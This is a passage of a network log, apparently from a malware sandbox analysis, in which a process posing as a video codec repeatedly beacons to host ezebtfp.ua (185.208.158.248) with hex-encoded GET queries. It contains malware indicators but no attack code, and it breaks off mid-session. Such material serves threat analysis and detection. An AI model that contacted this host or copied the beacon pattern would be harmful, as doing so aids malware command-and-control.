                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.549719185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:04.955013037 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:05.669584036 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:05.777793884 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:06.018551111 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.549720185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:06.142477989 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:06.831357956 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.549721185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:06.966164112 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:08.481785059 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:08.484606028 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:08.486325979 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:08.590416908 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:08.830358028 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.549722185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:08.954951048 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:09.645920992 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.549723185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:09.767479897 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:10.454655886 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.549724185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:10.579782963 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.274789095 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:11.387032986 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.624023914 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:11.730504990 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:11.967400074 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:12.082320929 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:12.328104973 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    11192.168.2.549725185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:12.455183029 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:13.668616056 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.668803930 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.668948889 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:13.778165102 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:14.019181013 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:13 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    12192.168.2.549726185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:14.143680096 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:14.838619947 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:14 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    13192.168.2.549727185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:14.970506907 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:15.663813114 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.549728185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:15.783762932 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:16.468743086 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:16 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.549729185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:16.595844984 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:17.286511898 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:17 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.549730185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:17.408485889 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:18.087939978 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:18.199320078 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:18.438894033 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.549731185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:18.564563990 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:19.251231909 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.549732185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 3, 2024 08:40:19.377352953 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:20.057390928 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20
                                                                                                    Oct 3, 2024 08:40:20.168422937 CEST321OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b HTTP/1.1
                                                                                                    Host: ezebtfp.ua
                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                    Oct 3, 2024 08:40:20.409823895 CEST220INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.20.1
                                                                                                    Date: Thu, 03 Oct 2024 06:40:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: e67b680813008c20


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.549733185.208.158.248801216C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    TimestampBytes transferredDirectionData
